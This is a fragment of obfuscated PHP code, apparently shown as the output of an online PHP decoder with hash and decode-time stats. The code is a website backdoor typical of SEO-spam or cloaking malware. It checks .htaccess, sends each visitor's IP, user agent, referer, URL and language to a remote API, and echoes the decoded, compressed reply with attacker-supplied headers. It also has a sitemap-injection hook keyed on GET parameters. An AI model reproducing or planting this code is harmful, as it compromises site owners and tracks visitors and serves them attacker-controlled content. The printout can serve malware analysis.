if (isset(${"\x5f\x47\x45\x54"}["\x73\x69\x74\x65\x6d\x61\x70"])) {
$BzcWSWaLmd = ${"\x5f\x47\x45\x54"}["\x73\x69\x74\x65\x6d\x61\x70"];
$gNCkXcKPUO = "www.google.com";
if (
isset(
${"\x5f\x47\x45\x54"}[
"\x67\x6f\x6f\x67\x6c\x65\x5f\x75\x72\x6c"
]
)
) {
$gNCkXcKPUO =
${"\x5f\x47\x45\x54"}[
"\x67\x6f\x6f\x67\x6c\x65\x5f\x75\x72\x6c"
];
}
CzpJNsfXeSfBEhZFi($gNCkXcKPUO, $BzcWSWaLmd, $WSsGxwUBbg);
}
}
}
f_check_htaccess();
$oCDdLrzurE = [
"\x64\x6f\x6d\x61\x69\x6e" =>
$WSsGxwUBbg["\x73\x65\x72\x76\x65\x72\x5f\x64\x6f\x6d\x61\x69\x6e"],
"\x72\x65\x71\x75\x65\x73\x74\x5f\x75\x72\x6c" =>
$WSsGxwUBbg["\x72\x65\x71\x75\x65\x73\x74\x5f\x75\x72\x6c"],
"\x69\x70" => $WSsGxwUBbg["\x69\x70"],
"\x61\x67\x65\x6e\x74" =>
$WSsGxwUBbg["\x75\x73\x65\x72\x5f\x61\x67\x65\x6e\x74"],
"\x72\x65\x66\x65\x72\x65\x72" =>
$WSsGxwUBbg["\x72\x65\x66\x65\x72\x65\x72"],
"\x70\x72\x6f\x74\x6f\x63\x6f\x6c" =>
$WSsGxwUBbg["\x70\x72\x6f\x74\x6f\x63\x6f\x6c"],
"\x6c\x61\x6e\x67\x75\x61\x67\x65" =>
$WSsGxwUBbg["\x6c\x61\x6e\x67\x75\x61\x67\x65"],
];
$PnaaKgeNhT = pRLPxnTtUbXlNlbFVDkoewbY(
$WSsGxwUBbg["\x61\x70\x69"],
2,
$oCDdLrzurE,
[],
$WSsGxwUBbg["\x73\x65\x72\x76\x65\x72\x5f\x64\x6f\x6d\x61\x69\x6e"]
);
if (isset(${"\x5f\x52\x45\x51\x55\x45\x53\x54"}["\x64\x75\x6d\x70"])) {
var_dump($PnaaKgeNhT);
$PnaaKgeNhT = pRLPxnTtUbXlNlbFVDkoewbY(
"https://" . "\x67\x6f\x6f\x67\x6c\x65" . ".com"
);
var_dump($PnaaKgeNhT);
die();
}
$PnaaKgeNhT = @gzuncompress(base64_decode($PnaaKgeNhT));
$tSZpeDkfiM = @preg_split("/\|/si", $PnaaKgeNhT, -1, PREG_SPLIT_NO_EMPTY);
if ($tSZpeDkfiM !== false) {
$zyCrRRwEaA = array_pop($tSZpeDkfiM);
$zyCrRRwEaA = base64_decode($zyCrRRwEaA);
foreach ($tSZpeDkfiM as $srcOFcvBhf) {
@header($srcOFcvBhf);
}
echo $zyCrRRwEaA;
die();
} ?>
Function Calls
None |
Stats
MD5 | f47b71eea08a9a5672cfda12ec852bc1 |
Eval Count | 0 |
Decode Time | 94 ms |